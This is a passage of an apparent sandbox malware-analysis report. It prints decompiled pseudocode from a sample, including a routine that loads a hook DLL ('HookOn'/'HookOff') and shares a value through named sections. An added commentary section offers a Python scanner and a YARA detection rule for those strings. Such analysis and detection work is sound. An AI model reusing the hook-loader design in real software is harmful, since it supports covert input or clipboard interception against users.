                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00429876
                                                    • SetBkColor.GDI32(?,00000000), ref: 00429880
                                                    • SelectObject.GDI32(?,00000000), ref: 00429893
                                                    • DeleteObject.GDI32 ref: 0042989F
                                                    • DeleteDC.GDI32(?), ref: 004298B5
                                                    • SelectObject.GDI32(?,00000000), ref: 004298D0
                                                    • DeleteDC.GDI32(00000000), ref: 004298EC
                                                    • ReleaseDC.USER32 ref: 004298FD
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                    • String ID:
                                                    • API String ID: 332224125-0
                                                    • Opcode ID: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                    • Instruction ID: d4ef2d2dc6560d6c5cd56807feb3c438281ae7d61b0b2818eaec840712012d23
                                                    • Opcode Fuzzy Hash: e7f05d306d0a013c5589103182213554a4e474e5cc72dcb54e20afbaf3b7396a
                                                    • Instruction Fuzzy Hash: 95516071F04218BBDB10EBE9DC45FAFB7FCAB09704F54446AB614F7281C678A9408B69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 86%
                                                    			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
                                                    				char _v8;
                                                    				struct HINSTANCE__* _t30;
                                                    				intOrPtr _t46;
                                                    				intOrPtr _t70;
                                                    				void* _t74;
                                                    				void* _t75;
                                                    				void* _t76;
                                                    				void* _t77;
                                                    				void* _t78;
                                                    				intOrPtr _t82;
                                                    				intOrPtr _t86;
                                                    				intOrPtr _t89;
                                                    				void _t97;
                                                    				void* _t99;
                                                    				intOrPtr _t102;
                                                    
                                                    				_push(0);
                                                    				_t97 = __ecx;
                                                    				_t74 = __edx;
                                                    				_t99 = __eax;
                                                    				_push(_t102);
                                                    				_push(0x476697);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t102;
                                                    				if(__edx == 0) {
                                                    					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
                                                    						 *((intOrPtr*)(__eax + 0x48))();
                                                    					}
                                                    					_t30 =  *(_t99 + 0x40);
                                                    					if(_t30 != 0) {
                                                    						FreeLibrary(_t30);
                                                    					}
                                                    					if( *(_t99 + 0x30) != 0) {
                                                    						UnmapViewOfFile( *(_t99 + 0x38));
                                                    						UnmapViewOfFile( *(_t99 + 0x3c));
                                                    						CloseHandle( *(_t99 + 0x30));
                                                    						CloseHandle( *(_t99 + 0x34));
                                                    					}
                                                    				} else {
                                                    					_t82 =  *0x49ec58; // 0x0
                                                    					E0047671C(__edx, _t82, __edx, __ecx, __eax);
                                                    					_t46 =  *0x49ec5c; // 0x0
                                                    					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
                                                    					if( *(_t99 + 0x40) == 0) {
                                                    						_t86 =  *0x49ec58; // 0x0
                                                    						E00404CCC( &_v8, _t86, 0x4766ac);
                                                    						E0047671C(_t74, _v8, _t74, _t97, _t99);
                                                    						_t70 =  *0x49ec5c; // 0x0
                                                    						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
                                                    					}
                                                    					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
                                                    					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
                                                    					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
                                                    						E0040D144(0x4766c8, 1);
                                                    						E00404378();
                                                    					}
                                                    					_t75 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "ElReceptor");
                                                    					 *(_t99 + 0x30) = _t75;
                                                    					if(_t75 == 0) {
                                                    						E0040D144(0x4766f8, 1);
                                                    						E00404378();
                                                    					}
                                                    					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
                                                    					 *(_t99 + 0x38) = _t76;
                                                    					 *_t76 = _t97;
                                                    					_t77 = CreateFileMappingA(0xffffffff, 0, 4, 0, 4, "CBReceptor");
                                                    					 *(_t99 + 0x34) = _t77;
                                                    					if(_t77 == 0) {
                                                    						E0040D144(0x4766f8, 1);
                                                    						E00404378();
                                                    					}
                                                    					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
                                                    					 *(_t99 + 0x3c) = _t78;
                                                    					 *_t78 = _t97;
                                                    					 *((intOrPtr*)(_t99 + 0x44))();
                                                    				}
                                                    				_pop(_t89);
                                                    				 *[fs:eax] = _t89;
                                                    				_push(0x47669e);
                                                    				return E004049C0( &_v8);
                                                    			}

                                                    Instruction addresses for the E004764E4 listing above (the per-line address column, detached from the C-code during extraction): 0x004764e7, 0x004764ec, 0x004764ee, 0x004764f0, 0x004764f4, 0x004764f5, 0x004764fa, 0x004764fd, 0x00476502, 0x00476645, 0x00476647, 0x00476647, 0x0047664a, 0x0047664f, 0x00476652, 0x00476652, 0x0047665b, 0x00476661, 0x0047666a, 0x00476673, 0x0047667c, 0x0047667c, 0x00476508, 0x00476508, 0x00476512, 0x00476517, 0x00476527, 0x0047652e, 0x00476533, 0x0047653e, 0x0047654a, 0x0047654f, 0x0047655f, 0x0047655f, 0x00476570, 0x00476581, 0x00476588, 0x0047659c, 0x004765a1, 0x004765a1, 0x004765ba, 0x004765bc, 0x004765c1, 0x004765cf, 0x004765d4, 0x004765d4, 0x004765ea, 0x004765ec, 0x004765ef, 0x00476605, 0x00476607, 0x0047660c, 0x0047661a, 0x0047661f, 0x0047661f, 0x00476635, 0x00476637, 0x0047663a, 0x0047663c, 0x0047663c, 0x00476683, 0x00476686, 0x00476689, 0x00476696

                                                    APIs
                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000), ref: 00476522
                                                    • LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00476697), ref: 0047655A
                                                    • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                    • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                    • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,ElReceptor,00000000,HookOff,00000000,HookOn), ref: 004765E5
                                                    • CreateFileMappingA.KERNEL32 ref: 00476600
                                                    • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,00000004,00000000,00000004,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476652
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476661
                                                    • UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 0047666A
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00476697), ref: 00476673
                                                    • CloseHandle.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0047667C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                    • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                    • API String ID: 2408097603-676361416
                                                    • Opcode ID: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                    • Opcode Fuzzy Hash: 72e6fa980a1183395053bc88635b47a3b0f05e5c8ec6e6a6430965d3f8941275
                                                    • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
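
The E004764E4 listing above is the part of this dump worth turning into a detection. When called with a non-zero __edx it loads a library whose name comes from a global, resolves the exports "HookOn" and "HookOff", creates two 4-byte pagefile-backed named sections (CreateFileMappingA with INVALID_HANDLE_VALUE, PAGE_READWRITE, names "ElReceptor" and "CBReceptor"), maps each with FILE_MAP_WRITE, stores the value passed in __ecx into the first dword of each view, and then calls HookOn; with __edx == 0 it runs the reverse path (HookOff, FreeLibrary, UnmapViewOfFile, CloseHandle). Because named sections are visible to every process in the session, a hook DLL loaded elsewhere can open the same names to read that value. The following script is an added triage helper, not part of the Joe Sandbox report or of the sample: it takes only the four strings shown in the listing and produces an offline scanner for a dump such as the .sdmp named above plus an equivalent YARA rule. The rule name and the sample buffers are constructed for the example.

```python
"""Added triage helper: turn the indicator strings from the E004764E4
listing into an offline check and a YARA rule.

The four strings are the ones visible in the decompiled function: the two
export names resolved with GetProcAddress and the two names passed to
CreateFileMappingA. Everything else here (rule name, sample buffers) is
constructed for the example and is not part of the sandbox report.
"""
import re

# Observed in the listing: GetProcAddress(..., "HookOn" / "HookOff")
EXPORT_NAMES = ("HookOn", "HookOff")
# Observed in the listing: CreateFileMappingA(..., "ElReceptor" / "CBReceptor")
SECTION_NAMES = ("ElReceptor", "CBReceptor")


def find_indicators(blob: bytes) -> dict:
    """Map each indicator to the sorted offsets where it occurs in blob.

    Both the ASCII form (what the ANSI APIs in the listing use) and the
    UTF-16LE form are searched. A hit must be bounded by non-identifier
    bytes, so "HookOn" does not fire on "HookOnly".
    """
    hits = {}
    for name in EXPORT_NAMES + SECTION_NAMES:
        offsets = []
        for encoded in (name.encode("ascii"), name.encode("utf-16-le")):
            pattern = re.compile(
                rb"(?<![A-Za-z0-9_])" + re.escape(encoded) + rb"(?![A-Za-z0-9_])"
            )
            offsets.extend(m.start() for m in pattern.finditer(blob))
        hits[name] = sorted(offsets)
    return hits


def classify(hits: dict) -> str:
    """Verdict for a scanned buffer.

    The loader is characterised by the pairing: an export name AND a
    section name. One half alone is reported as "partial" so it can be
    reviewed rather than silently matched or dropped.
    """
    have_export = any(hits[n] for n in EXPORT_NAMES)
    have_section = any(hits[n] for n in SECTION_NAMES)
    if have_export and have_section:
        return "match"
    if have_export or have_section:
        return "partial"
    return "none"


def yara_rule(rule_name: str = "hook_loader_elreceptor_cbreceptor") -> str:
    """Emit a YARA rule with the same pairing logic as classify()."""
    lines = [f"rule {rule_name}", "{", "    strings:"]
    for i, name in enumerate(EXPORT_NAMES):
        lines.append(f'        $exp{i} = "{name}" ascii wide fullword')
    for i, name in enumerate(SECTION_NAMES):
        lines.append(f'        $sec{i} = "{name}" ascii wide fullword')
    lines += ["    condition:", "        1 of ($exp*) and 1 of ($sec*)", "}"]
    return "\n".join(lines)


def scan_file(path: str) -> str:
    """Classify a memory dump or PE image on disk (e.g. the .sdmp named above)."""
    with open(path, "rb") as fh:
        return classify(find_indicators(fh.read()))


# Constructed stand-in for a memory dump: NUL-terminated strings as a PE
# image would hold them, plus a near-miss ("HookOnly") that must not match.
SAMPLE_DUMP = (
    b"\x00" * 16 + b"HookOn\x00" + b"\x00" * 8 + b"HookOff\x00"
    + b"junk\x00" + b"ElReceptor\x00" + b"CBReceptor\x00" + b"HookOnly\x00"
)
# Constructed clean buffer: substrings only, no full indicator.
CLEAN_DUMP = b"\x00" * 32 + b"HookOnly\x00" + b"Receptor\x00"


if __name__ == "__main__":
    for label, blob in (("sample", SAMPLE_DUMP), ("clean", CLEAN_DUMP)):
        hits = find_indicators(blob)
        print(label, classify(hits), {k: v for k, v in hits.items() if v})
    print(yara_rule())
```

The rule deliberately requires one export name and one section name rather than any single string: either pair on its own is a generic identifier, the combination is what this loader exhibits. Run `scan_file()` against the process dump listed under Memory Dump Source to confirm the strings are present in the unpacked image rather than only in the on-disk sample.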

                                                    C-Code - Quality: 79%
                                                    			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr* _v12;
                                                    				struct HDC__* _v16;
                                                    				struct HDC__* _v20;
                                                    				void* _v24;
                                                    				BITMAPINFOHEADER* _v28;
                                                    				intOrPtr _v32;
                                                    				intOrPtr _v36;
                                                    				signed int _v37;
                                                    				struct HBITMAP__* _v44;
                                                    				void* _v48;
                                                    				struct HPALETTE__* _v52;
                                                    				struct HPALETTE__* _v56;
                                                    				intOrPtr* _v60;
                                                    				intOrPtr* _v64;
                                                    				short _v66;
                                                    				short _v68;
                                                    				signed short _v70;
                                                    				signed short _v72;
                                                    				void* _v76;
                                                    				intOrPtr _v172;
                                                    				char _v174;
                                                    				intOrPtr _t150;
                                                    				signed int _t160;
                                                    				intOrPtr _t164;
                                                    				signed int _t193;
                                                    				signed int _t218;
                                                    				signed short _t224;
                                                    				intOrPtr _t251;
                                                    				intOrPtr* _t255;
                                                    				intOrPtr _t261;
                                                    				intOrPtr _t299;
                                                    				intOrPtr _t300;
                                                    				intOrPtr _t305;
                                                    				signed int _t307;
                                                    				signed int _t327;
                                                    				void* _t329;
                                                    				void* _t330;
                                                    				signed int _t331;
                                                    				void* _t332;
                                                    				void* _t333;
                                                    				void* _t334;
                                                    				intOrPtr _t335;
                                                    
                                                    				_t326 = __edi;
                                                    				_t333 = _t334;
                                                    				_t335 = _t334 + 0xffffff54;
                                                    				_t329 = __ecx;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				_v52 = 0;
                                                    				_v44 = 0;
                                                    				_v60 = 0;
                                                    				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t332);
                                                    				_v37 = _v36 == 0xc;
                                                    				if(_v37 != 0) {
                                                    					_v36 = 0x28;
                                                    				}
                                                    				_v28 = E0040275C(_v36 + 0x40c);
                                                    				_v64 = _v28;
                                                    				_push(_t333);
                                                    				_push(0x42aa2d);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t335;
                                                    				_push(_t333);
                                                    				_push(0x42aa00);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t335;
                                                    				if(_v37 == 0) {
                                                    					 *((intOrPtr*)( *_v12 + 0xc))();
                                                    					_t330 = _t329 - _v36;
                                                    					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                                    					if(_t150 != 3 && _t150 != 0) {
                                                    						_v60 = L00403BBC(1);
                                                    						if(_a4 == 0) {
                                                    							E004032B4( &_v174, 0xe);
                                                    							_v174 = 0x4d42;
                                                    							_v172 = _v36 + _t330;
                                                    							_a4 =  &_v174;
                                                    						}
                                                    						 *((intOrPtr*)( *_v60 + 0x10))();
                                                    						 *((intOrPtr*)( *_v60 + 0x10))();
                                                    						 *((intOrPtr*)( *_v60 + 0x10))();
                                                    						L0041D93C(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
                                                    						 *((intOrPtr*)( *_v60 + 0x14))();
                                                    						_v12 = _v60;
                                                    					}
                                                    				} else {
                                                    					 *((intOrPtr*)( *_v12 + 0xc))();
                                                    					_t261 = _v64;
                                                    					E004032B4(_t261, 0x28);
                                                    					_t251 = _t261;
                                                    					 *(_t251 + 4) = _v72 & 0x0000ffff;
                                                    					 *(_t251 + 8) = _v70 & 0x0000ffff;
                                                    					 *((short*)(_t251 + 0xc)) = _v68;
                                                    					 *((short*)(_t251 + 0xe)) = _v66;
                                                    					_t330 = _t329 - 0xc;
                                                    				}
                                                    				_t255 = _v64;
                                                    				 *_t255 = _v36;
                                                    				_v32 = _v28 + _v36;
                                                    				if( *((short*)(_t255 + 0xc)) != 1) {
                                                    					L00425F40();
                                                    				}
                                                    				if(_v36 == 0x28) {
                                                    					_t224 =  *(_t255 + 0xe);
                                                    					if(_t224 == 0x10 || _t224 == 0x20) {
                                                    						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
                                                    							L0041D8CC(_v12, 0xc, _v32);
                                                    							_v32 = _v32 + 0xc;
                                                    							_t330 = _t330 - 0xc;
                                                    						}
                                                    					}
                                                    				}
                                                    				if( *(_t255 + 0x20) == 0) {
                                                    					 *(_t255 + 0x20) = E004261D0( *(_t255 + 0xe));
                                                    				}
                                                    				_t327 = _v37 & 0x000000ff;
                                                    				_t267 =  *(_t255 + 0x20) * 0;
                                                    				L0041D8CC(_v12,  *(_t255 + 0x20) * 0, _v32);
                                                    				_t331 = _t330 -  *(_t255 + 0x20) * 0;
                                                    				if( *(_t255 + 0x14) == 0) {
                                                    					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
                                                    					_t218 = E004261F0( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
                                                    					asm("cdq");
                                                    					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                                    					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
                                                    				}
                                                    				_t160 =  *(_t255 + 0x14);
                                                    				if(_t331 > _t160) {
                                                    					_t331 = _t160;
                                                    				}
                                                    				if(_v37 != 0) {
                                                    					E00426498(_v32);
                                                    				}
                                                    				_v16 = E00426060(GetDC(0));
                                                    				_push(_t333);
                                                    				_push(0x42a97b);
                                                    				_push( *[fs:edx]);
                                                    				 *[fs:edx] = _t335;
                                                    				_t164 =  *((intOrPtr*)(_v64 + 0x10));
                                                    				if(_t164 == 0 || _t164 == 3) {
                                                    					if( *0x49b620 == 0) {
                                                    						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
                                                    						if(_v44 == 0 || _v24 == 0) {
                                                    							if(GetLastError() != 0) {
                                                    								E0040E79C(_t255, _t267, _t327, _t331);
                                                    							} else {
                                                    								L00425F40();
                                                    							}
                                                    						}
                                                    						_push(_t333);
                                                    						_push( *[fs:eax]);
                                                    						 *[fs:eax] = _t335;
                                                    						L0041D8CC(_v12, _t331, _v24);
                                                    						_pop(_t299);
                                                    						 *[fs:eax] = _t299;
                                                    						_t300 = 0x42a94a;
                                                    						 *[fs:eax] = _t300;
                                                    						_push(0x42a982);
                                                    						return ReleaseDC(0, _v16);
                                                    					} else {
                                                    						goto L27;
                                                    					}
                                                    				} else {
                                                    					L27:
                                                    					_v20 = 0;
                                                    					_v24 = E0040275C(_t331);
                                                    					_push(_t333);
                                                    					_push(0x42a8e3);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t335;
                                                    					_t273 = _t331;
                                                    					L0041D8CC(_v12, _t331, _v24);
                                                    					_v20 = E00426060(CreateCompatibleDC(_v16));
                                                    					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
                                                    					_v56 = 0;
                                                    					_t193 =  *(_v64 + 0x20);
                                                    					if(_t193 > 0) {
                                                    						_t273 = _t193;
                                                    						_v52 = E00426750(0, _t193);
                                                    						_v56 = SelectPalette(_v20, _v52, 0);
                                                    						RealizePalette(_v20);
                                                    					}
                                                    					_push(_t333);
                                                    					_push(0x42a8b7);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t335;
                                                    					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
                                                    					if(_v44 == 0) {
                                                    						if(GetLastError() != 0) {
                                                    							E0040E79C(_t255, _t273, _t327, _t331);
                                                    						} else {
                                                    							L00425F40();
                                                    						}
                                                    					}
                                                    					_pop(_t305);
                                                    					 *[fs:eax] = _t305;
                                                    					_push(0x42a8be);
                                                    					if(_v56 != 0) {
                                                    						SelectPalette(_v20, _v56, 0xffffffff);
                                                    					}
                                                    					return DeleteObject(SelectObject(_v20, _v48));
                                                    				}
                                                    			}
                                                    Instruction address column of the listing above (0x0042a510 to 0x0042a97a), detached from the code lines by extraction.

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 0042A77A
                                                    • CreateCompatibleDC.GDI32(00000001), ref: 0042A7DF
                                                    • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 0042A7F4
                                                    • SelectObject.GDI32(?,00000000), ref: 0042A7FE
                                                    • SelectPalette.GDI32(?,?,00000000), ref: 0042A82E
                                                    • RealizePalette.GDI32(?), ref: 0042A83A
                                                    • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042A85E
                                                    • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,0042A8B7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 0042A86C
                                                    • SelectPalette.GDI32(?,00000000,000000FF), ref: 0042A89E
                                                    • SelectObject.GDI32(?,?), ref: 0042A8AB
                                                    • DeleteObject.GDI32(00000000), ref: 0042A8B1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                    • String ID: ($BM
                                                    • API String ID: 2831685396-2980357723
                                                    • Opcode ID: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction ID: 25b6b903fc63a4d1ab3304e11741f41bc99333438c5c48279b365a0d6610163c
                                                    • Opcode Fuzzy Hash: 496f69271fb9ccee439b3da71489c37b304fc4bf0672b7fc97fcd75c0970043d
                                                    • Instruction Fuzzy Hash: A8D14C74F002189FDB04EFA9D885BAEBBB5FF48304F54846AE904E7391D7389851CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00426070(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
                                                    				void* _v8;
                                                    				int _v12;
                                                    				int _v16;
                                                    				struct HBITMAP__* _v20;
                                                    				struct HDC__* _v24;
                                                    				struct HDC__* _v28;
                                                    				struct HDC__* _v32;
                                                    				int _v48;
                                                    				int _v52;
                                                    				void _v56;
                                                    				void* _t77;
                                                    				void* _t78;
                                                    				intOrPtr _t85;
                                                    				intOrPtr _t86;
                                                    				void* _t91;
                                                    				void* _t93;
                                                    				void* _t94;
                                                    				intOrPtr _t95;
                                                    
                                                    				_t93 = _t94;
                                                    				_t95 = _t94 + 0xffffffcc;
                                                    				asm("movsd");
                                                    				asm("movsd");
                                                    				_t77 = __ecx;
                                                    				_v8 = __eax;
                                                    				_v28 = CreateCompatibleDC(0);
                                                    				_v32 = CreateCompatibleDC(0);
                                                    				_push(_t93);
                                                    				_push(0x4261be);
                                                    				_push( *[fs:eax]);
                                                    				 *[fs:eax] = _t95;
                                                    				GetObjectA(_v8, 0x18,  &_v56);
                                                    				if(__ecx == 0) {
                                                    					_v24 = GetDC(0);
                                                    					if(_v24 == 0) {
                                                    						L00425FB8(_t77);
                                                    					}
                                                    					_push(_t93);
                                                    					_push(0x42612d);
                                                    					_push( *[fs:eax]);
                                                    					 *[fs:eax] = _t95;
                                                    					_v20 = CreateCompatibleBitmap(_v24, _v16, _v12);
                                                    					if(_v20 == 0) {
                                                    						L00425FB8(_t77);
                                                    					}
                                                    					_pop(_t85);
                                                    					 *[fs:eax] = _t85;
                                                    					_push(0x426134);
                                                    					return ReleaseDC(0, _v24);
                                                    				} else {
                                                    					_v20 = CreateBitmap(_v16, _v12, 1, 1, 0);
                                                    					if(_v20 != 0) {
                                                    						_t78 = SelectObject(_v28, _v8);
                                                    						_t91 = SelectObject(_v32, _v20);
                                                    						StretchBlt(_v32, 0, 0, _v16, _v12, _v28, 0, 0, _v52, _v48, 0xcc0020);
                                                    						if(_t78 != 0) {
                                                    							SelectObject(_v28, _t78);
                                                    						}
                                                    						if(_t91 != 0) {
                                                    							SelectObject(_v32, _t91);
                                                    						}
                                                    					}
                                                    					_pop(_t86);
                                                    					 *[fs:eax] = _t86;
                                                    					_push(0x4261c5);
                                                    					DeleteDC(_v28);
                                                    					return DeleteDC(_v32);
                                                    				}
                                                    			}
                                                    Instruction address column of the listing above (0x00426071 to 0x004261bd), detached from the code lines by extraction.

                                                    APIs
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426087
                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00426091
                                                    • GetObjectA.GDI32(?,00000018,?), ref: 004260B1
                                                    • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004260C8
                                                    • GetDC.USER32(00000000), ref: 004260D4
                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00426101
                                                    • ReleaseDC.USER32 ref: 00426127
                                                    • SelectObject.GDI32(?,?), ref: 00426142
                                                    • SelectObject.GDI32(?,00000000), ref: 00426151
                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0042617D
                                                    • SelectObject.GDI32(?,00000000), ref: 0042618B
                                                    • SelectObject.GDI32(?,00000000), ref: 00426199
                                                    • DeleteDC.GDI32(?), ref: 004261AF
                                                    • DeleteDC.GDI32(?), ref: 004261B8
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Object$CreateSelect$Compatible$BitmapDelete$ReleaseStretch
                                                    • String ID:
                                                    • API String ID: 644427674-0
                                                    • Opcode ID: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction ID: 23bfd75d1e5f7ab71a99e75aee45f16e7152ef54e2d5d773258edcec8bfffe0d
                                                    • Opcode Fuzzy Hash: 96549eea74ed33ff1694cbe071ccede941aae8e18c591fd20771ef1c91b8bae9
                                                    • Instruction Fuzzy Hash: 9D411271E04219AFDB10DBE9DC42FAFB7BCEB08704F91446AB604F7281C67869108769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 57%
                                                    			E004424F8(intOrPtr* __eax, intOrPtr __edx) {
                                                    				intOrPtr* _v8;
                                                    				intOrPtr _v12;
                                                    				struct HDC__* _v16;
                                                    				struct tagRECT _v32;
                                                    				struct tagRECT _v48;
                                                    				void* _v64;
                                                    				intOrPtr* _t195;
                                                    				intOrPtr* _t198;
                                                    				intOrPtr _t207;
                                                    				void* _t210;
                                                    				intOrPtr _t218;
                                                    				signed int _t236;
                                                    				void* _t239;
                                                    				void* _t241;
                                                    				intOrPtr _t242;
                                                    
                                                    				_t239 = _t241;
                                                    				_t242 = _t241 + 0xffffffc4;
                                                    				_v12 = __edx;
                                                    				_v8 = __eax;
                                                    				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
                                                    					_v16 = GetWindowDC(E00441704(_v8));
                                                    					_push(_t239);
                                                    					_push(0x44275e);
                                                    					_push( *[fs:edx]);
                                                    					 *[fs:edx] = _t242;
                                                    					GetClientRect(E00441704(_v8),  &_v32);
                                                    					GetWindowRect(E00441704(_v8),  &_v48);
                                                    					MapWindowPoints(0, E00441704(_v8),  &_v48, 2);
                                                    					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
                                                    					ExcludeClipRect(_v16, _v32.left, _v32.top, _v32.right, _v32.bottom);
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					asm("movsd");
                                                    					if( *(_v8 + 0x165) != 0) {
                                                    						_t210 = 0;
                                                    						if( *(_v8 + 0x163) != 0) {
                                                    							_t210 = 0 +  *((intOrPtr*)(_v8 + 0x168));
                                                    						}
                                                    						if( *(_v8 + 0x164) != 0) {
                                                    							_t210 = _t210 +  *((intOrPtr*)(_v8 + 0x168));
                                                    						}
                                                    						_t236 = GetWindowLongA(E00441704(_v8), 0xfffffff0);
                                                    						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
                                                    							_v48.left = _v48.left - _t210;
                                                    						}
                                                    						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
                                                    							_v48.top = _v48.top - _t210;
                                                    						}
                                                    						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
                                                    							_v48.right = _v48.right + _t210;
                                                    						}
                                                    						if((_t236 & 0x00200000) != 0) {
                                                    							_t198 =  *0x49d970; // 0x49e900
                                                    							_v48.right = _v48.right +  *((intOrPtr*)( *_t198))(0x14);
                                                    						}
                                                    						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
                                                    							_v48.bottom = _v48.bottom + _t210;
                                                    						}
                                                    						if((_t236 & 0x00100000) != 0) {
                                                    							_t195 =  *0x49d970; // 0x49e900
                                                    							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t195))(0x15);
                                                    						}
